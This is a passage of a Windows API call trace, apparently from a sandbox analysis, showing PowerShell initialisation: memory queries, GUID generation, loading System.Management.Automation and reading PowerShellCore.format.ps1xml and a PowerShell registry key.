	[0412.355] VirtualQuery (in: lpAddress=0x20bc50, lpBuffer=0x20cb10, dwLength=0x30 | out: lpBuffer=0x20cb10*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.355] VirtualQuery (in: lpAddress=0x20bce0, lpBuffer=0x20cba0, dwLength=0x30 | out: lpBuffer=0x20cba0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.355] VirtualQuery (in: lpAddress=0x20bc50, lpBuffer=0x20cb10, dwLength=0x30 | out: lpBuffer=0x20cb10*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.355] VirtualQuery (in: lpAddress=0x20bce0, lpBuffer=0x20cba0, dwLength=0x30 | out: lpBuffer=0x20cba0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.356] VirtualQuery (in: lpAddress=0x20b920, lpBuffer=0x20c7e0, dwLength=0x30 | out: lpBuffer=0x20c7e0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.356] VirtualQuery (in: lpAddress=0x20bc50, lpBuffer=0x20cb10, dwLength=0x30 | out: lpBuffer=0x20cb10*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.356] VirtualQuery (in: lpAddress=0x20bce0, lpBuffer=0x20cba0, dwLength=0x30 | out: lpBuffer=0x20cba0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.356] VirtualQuery (in: lpAddress=0x20bc50, lpBuffer=0x20cb10, dwLength=0x30 | out: lpBuffer=0x20cb10*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.356] VirtualQuery (in: lpAddress=0x20bce0, lpBuffer=0x20cba0, dwLength=0x30 | out: lpBuffer=0x20cba0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.356] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x36f02313, Data2=0xa2b7, Data3=0x46e6, Data4=([0]=0xaa, [1]=0x82, [2]=0xf6, [3]=0x5e, [4]=0xf1, [5]=0x5, [6]=0x31, [7]=0xb5))) returned 0x0
	[0412.356] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x87d28832, Data2=0x6275, Data3=0x43ac, Data4=([0]=0x82, [1]=0xee, [2]=0x80, [3]=0x54, [4]=0x2d, [5]=0xc8, [6]=0x38, [7]=0x91))) returned 0x0
	[0412.356] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x7df0ec9, Data2=0x64e0, Data3=0x4fd3, Data4=([0]=0x84, [1]=0x51, [2]=0xc8, [3]=0x9, [4]=0x87, [5]=0x9f, [6]=0x8b, [7]=0xe1))) returned 0x0
	[0412.357] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xa1e50526, Data2=0x101, Data3=0x4c97, Data4=([0]=0xb6, [1]=0xf1, [2]=0xd4, [3]=0x74, [4]=0xe0, [5]=0x1b, [6]=0x76, [7]=0x60))) returned 0x0
	[0412.357] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x58bee868, Data2=0x53ef, Data3=0x4feb, Data4=([0]=0x8b, [1]=0x61, [2]=0x56, [3]=0x86, [4]=0xe4, [5]=0xe, [6]=0x98, [7]=0x8))) returned 0x0
	[0412.357] VirtualQuery (in: lpAddress=0x20ba30, lpBuffer=0x20c8f0, dwLength=0x30 | out: lpBuffer=0x20c8f0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.357] VirtualQuery (in: lpAddress=0x20bac0, lpBuffer=0x20c980, dwLength=0x30 | out: lpBuffer=0x20c980*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.357] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x75a3b9f4, Data2=0xb4b2, Data3=0x44ed, Data4=([0]=0x8a, [1]=0xba, [2]=0xdc, [3]=0xef, [4]=0x1d, [5]=0x86, [6]=0x8, [7]=0x2a))) returned 0x0
	[0412.357] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x29f4a468, Data2=0xbff3, Data3=0x4b67, Data4=([0]=0x88, [1]=0x2f, [2]=0xfc, [3]=0xc1, [4]=0xe6, [5]=0x20, [6]=0x7f, [7]=0x5e))) returned 0x0
	[0412.358] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x9383700b, Data2=0xfb7a, Data3=0x43e7, Data4=([0]=0x97, [1]=0xf9, [2]=0xee, [3]=0x8e, [4]=0xb1, [5]=0x27, [6]=0xe5, [7]=0xf7))) returned 0x0
	[0412.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.680] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0412.680] SetErrorMode (uMode=0x1) returned 0x1
	[0412.680] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0412.680] GetFileType (hFile=0x2fc) returned 0x1
	[0412.680] SetErrorMode (uMode=0x1) returned 0x1
	[0412.680] GetFileType (hFile=0x2fc) returned 0x1
	[0412.680] ReadFile (in: hFile=0x2fc, lpBuffer=0x3312890, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x3312890*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0412.680] ReadFile (in: hFile=0x2fc, lpBuffer=0x3312890, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x3312890*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0412.681] ReadFile (in: hFile=0x2fc, lpBuffer=0x3312890, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x3312890*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0412.681] ReadFile (in: hFile=0x2fc, lpBuffer=0x3312890, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x3312890*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0412.681] ReadFile (in: hFile=0x2fc, lpBuffer=0x3312890, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x3312890*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0412.681] ReadFile (in: hFile=0x2fc, lpBuffer=0x3312890, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x3312890*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0412.681] ReadFile (in: hFile=0x2fc, lpBuffer=0x3312890, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x3312890*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0412.682] ReadFile (in: hFile=0x2fc, lpBuffer=0x3312890, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x3312890*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0412.682] ReadFile (in: hFile=0x2fc, lpBuffer=0x3312890, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x3312890*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0412.683] ReadFile (in: hFile=0x2fc, lpBuffer=0x3312890, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x3312890*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0412.683] ReadFile (in: hFile=0x2fc, lpBuffer=0x3312890, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x3312890*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0412.683] ReadFile (in: hFile=0x2fc, lpBuffer=0x3312890, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x3312890*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0412.683] ReadFile (in: hFile=0x2fc, lpBuffer=0x3312890, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x3312890*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0412.684] ReadFile (in: hFile=0x2fc, lpBuffer=0x3312890, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x3312890*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0412.684] ReadFile (in: hFile=0x2fc, lpBuffer=0x3312890, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x3312890*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0412.684] ReadFile (in: hFile=0x2fc, lpBuffer=0x3312890, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x3312890*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0412.684] ReadFile (in: hFile=0x2fc, lpBuffer=0x3312890, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x3312890*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0412.686] ReadFile (in: hFile=0x2fc, lpBuffer=0x3312890, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x3312890*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0412.686] ReadFile (in: hFile=0x2fc, lpBuffer=0x3312890, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x3312890*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0412.686] ReadFile (in: hFile=0x2fc, lpBuffer=0x3312890, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x3312890*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0412.686] ReadFile (in: hFile=0x2fc, lpBuffer=0x3312890, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x3312890*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0412.687] ReadFile (in: hFile=0x2fc, lpBuffer=0x3312890, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x3312890*, lpNumberOfBytesRead=0x20d218*=0xe67, lpOverlapped=0x0) returned 1
	[0412.687] ReadFile (in: hFile=0x2fc, lpBuffer=0x3311e5f, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x3311e5f*, lpNumberOfBytesRead=0x20d218*=0x0, lpOverlapped=0x0) returned 1
	[0412.687] ReadFile (in: hFile=0x2fc, lpBuffer=0x3312890, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x3312890*, lpNumberOfBytesRead=0x20d218*=0x0, lpOverlapped=0x0) returned 1
	[0412.687] CloseHandle (hObject=0x2fc) returned 1
	[0412.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0412.687] SetErrorMode (uMode=0x1) returned 0x1
	[0412.687] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d1c0 | out: lpFileInformation=0x20d1c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0412.687] SetErrorMode (uMode=0x1) returned 0x1
	[0412.688] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0412.688] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d2a8 | out: phkResult=0x20d2a8*=0x2fc) returned 0x0
	[0412.688] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d22c, lpData=0x0, lpcbData=0x20d228*=0x0 | out: lpType=0x20d22c*=0x1, lpData=0x0, lpcbData=0x20d228*=0x56) returned 0x0
	[0412.688] CoTaskMemAlloc (cb=0x5a) returned 0x2b9000
	[0412.688] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d1fc, lpData=0x2b9000, lpcbData=0x20d1f8*=0x56 | out: lpType=0x20d1fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20d1f8*=0x56) returned 0x0
	[0412.688] CoTaskMemFree (pv=0x2b9000) 
	[0412.688] RegCloseKey (hKey=0x2fc) returned 0x0
	[0412.688] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0412.688] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0412.697] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x4d676dc9, Data2=0x84e0, Data3=0x446f, Data4=([0]=0x9a, [1]=0xd3, [2]=0x16, [3]=0x33, [4]=0x73, [5]=0x48, [6]=0xd1, [7]=0x76))) returned 0x0
	[0412.697] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xbd968d42, Data2=0xda18, Data3=0x449f, Data4=([0]=0x91, [1]=0xfe, [2]=0x28, [3]=0x68, [4]=0xff, [5]=0x6d, [6]=0x45, [7]=0x7b))) returned 0x0
	[0412.697] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x35c59584, Data2=0x9cb2, Data3=0x4e3d, Data4=([0]=0x89, [1]=0x8e, [2]=0x89, [3]=0x96, [4]=0x70, [5]=0x0, [6]=0x62, [7]=0x6f))) returned 0x0
	[0412.698] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xa755d50e, Data2=0xd045, Data3=0x4e0f, Data4=([0]=0x8c, [1]=0x39, [2]=0x94, [3]=0x16, [4]=0x17, [5]=0x8c, [6]=0xac, [7]=0x62))) returned 0x0
	[0412.698] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xd61d3768, Data2=0x88c4, Data3=0x47d0, Data4=([0]=0x9b, [1]=0xbb, [2]=0xeb, [3]=0xbe, [4]=0x1f, [5]=0xfd, [6]=0x30, [7]=0x9b))) returned 0x0
	[0412.698] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xb98d26a6, Data2=0x44e7, Data3=0x4363, Data4=([0]=0x9f, [1]=0x2c, [2]=0x24, [3]=0xfb, [4]=0xad, [5]=0xd5, [6]=0x26, [7]=0xab))) returned 0x0
	[0412.698] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x7a5c693d, Data2=0xab0a, Data3=0x4cbd, Data4=([0]=0x88, [1]=0xf7, [2]=0xa3, [3]=0xe4, [4]=0x80, [5]=0xee, [6]=0x17, [7]=0x51))) returned 0x0
	[0412.698] VirtualQuery (in: lpAddress=0x20be80, lpBuffer=0x20cd40, dwLength=0x30 | out: lpBuffer=0x20cd40*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.699] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x3f36a96b, Data2=0xb6fa, Data3=0x48f2, Data4=([0]=0xb9, [1]=0x53, [2]=0xea, [3]=0x1c, [4]=0x26, [5]=0xa4, [6]=0x5b, [7]=0xb))) returned 0x0
	[0412.700] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x8bdbbd0e, Data2=0x9789, Data3=0x4804, Data4=([0]=0xbe, [1]=0xf3, [2]=0x82, [3]=0xee, [4]=0x3, [5]=0x63, [6]=0xfc, [7]=0x94))) returned 0x0
	[0412.700] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xfdb6a690, Data2=0xa9b4, Data3=0x4e27, Data4=([0]=0xa8, [1]=0x43, [2]=0x13, [3]=0xe1, [4]=0x59, [5]=0xb6, [6]=0xb4, [7]=0x26))) returned 0x0
	[0412.700] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xbe3280b9, Data2=0x5263, Data3=0x4e53, Data4=([0]=0xa8, [1]=0xe0, [2]=0xc2, [3]=0x8c, [4]=0xfc, [5]=0x1c, [6]=0x74, [7]=0x48))) returned 0x0
	[0412.700] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xb50ca6f5, Data2=0x5f3f, Data3=0x4680, Data4=([0]=0x93, [1]=0xac, [2]=0x57, [3]=0x59, [4]=0xfb, [5]=0x2f, [6]=0xcc, [7]=0x2a))) returned 0x0
	[0412.700] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x551e9136, Data2=0xcad2, Data3=0x47be, Data4=([0]=0xa2, [1]=0x87, [2]=0x29, [3]=0x78, [4]=0x82, [5]=0xcb, [6]=0xb5, [7]=0x30))) returned 0x0
	[0412.700] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xca88f921, Data2=0xabee, Data3=0x47a5, Data4=([0]=0xa0, [1]=0xcf, [2]=0xf8, [3]=0x88, [4]=0xc1, [5]=0x45, [6]=0x8d, [7]=0x30))) returned 0x0
	[0412.700] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xa4a10c4, Data2=0x400f, Data3=0x4685, Data4=([0]=0x9b, [1]=0xb8, [2]=0x70, [3]=0x50, [4]=0xc2, [5]=0x21, [6]=0x5, [7]=0xbd))) returned 0x0
	[0412.701] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x8a58e796, Data2=0x88da, Data3=0x40b9, Data4=([0]=0xad, [1]=0xc8, [2]=0xea, [3]=0xef, [4]=0x19, [5]=0xb0, [6]=0xb7, [7]=0x81))) returned 0x0
	[0412.701] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x9537ae96, Data2=0xe7ff, Data3=0x4136, Data4=([0]=0x93, [1]=0x1a, [2]=0xd0, [3]=0x86, [4]=0xc9, [5]=0xe7, [6]=0xa, [7]=0xab))) returned 0x0
	[0412.701] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x9cc55ab1, Data2=0xdbcf, Data3=0x4a91, Data4=([0]=0xa4, [1]=0x25, [2]=0x70, [3]=0xf7, [4]=0x7, [5]=0xd5, [6]=0xfa, [7]=0xe7))) returned 0x0
	[0412.701] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x101d13b8, Data2=0xb542, Data3=0x48b0, Data4=([0]=0xa9, [1]=0x1b, [2]=0xb, [3]=0x24, [4]=0x36, [5]=0x66, [6]=0xd3, [7]=0x8e))) returned 0x0
	[0412.701] VirtualQuery (in: lpAddress=0x20be80, lpBuffer=0x20cd40, dwLength=0x30 | out: lpBuffer=0x20cd40*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.703] VirtualQuery (in: lpAddress=0x20be80, lpBuffer=0x20cd40, dwLength=0x30 | out: lpBuffer=0x20cd40*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.705] VirtualQuery (in: lpAddress=0x20be80, lpBuffer=0x20cd40, dwLength=0x30 | out: lpBuffer=0x20cd40*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.705] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x47ace5f9, Data2=0xbfa4, Data3=0x43f1, Data4=([0]=0x96, [1]=0x19, [2]=0x50, [3]=0x70, [4]=0xe4, [5]=0xc6, [6]=0xfd, [7]=0x6b))) returned 0x0
	[0412.705] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xc6cf608c, Data2=0x94de, Data3=0x4202, Data4=([0]=0xac, [1]=0x48, [2]=0xc6, [3]=0xf3, [4]=0x9a, [5]=0xd0, [6]=0xeb, [7]=0x37))) returned 0x0
	[0412.706] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xf4daf101, Data2=0x3e7d, Data3=0x4c61, Data4=([0]=0xaf, [1]=0x1e, [2]=0x61, [3]=0xc9, [4]=0x30, [5]=0x9f, [6]=0x9e, [7]=0x8c))) returned 0x0
	[0412.706] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x83db5d41, Data2=0xbe99, Data3=0x4165, Data4=([0]=0x8b, [1]=0x36, [2]=0x35, [3]=0x7, [4]=0x29, [5]=0x75, [6]=0x10, [7]=0x6b))) returned 0x0
	[0412.706] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xe9f2e0f0, Data2=0x5f4d, Data3=0x4be8, Data4=([0]=0xbe, [1]=0xa9, [2]=0x33, [3]=0x91, [4]=0x41, [5]=0x7d, [6]=0x48, [7]=0x6e))) returned 0x0
	[0412.706] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x7eb579a3, Data2=0x75f2, Data3=0x441c, Data4=([0]=0x88, [1]=0x2b, [2]=0x7e, [3]=0x95, [4]=0x4d, [5]=0x25, [6]=0xe0, [7]=0xd5))) returned 0x0
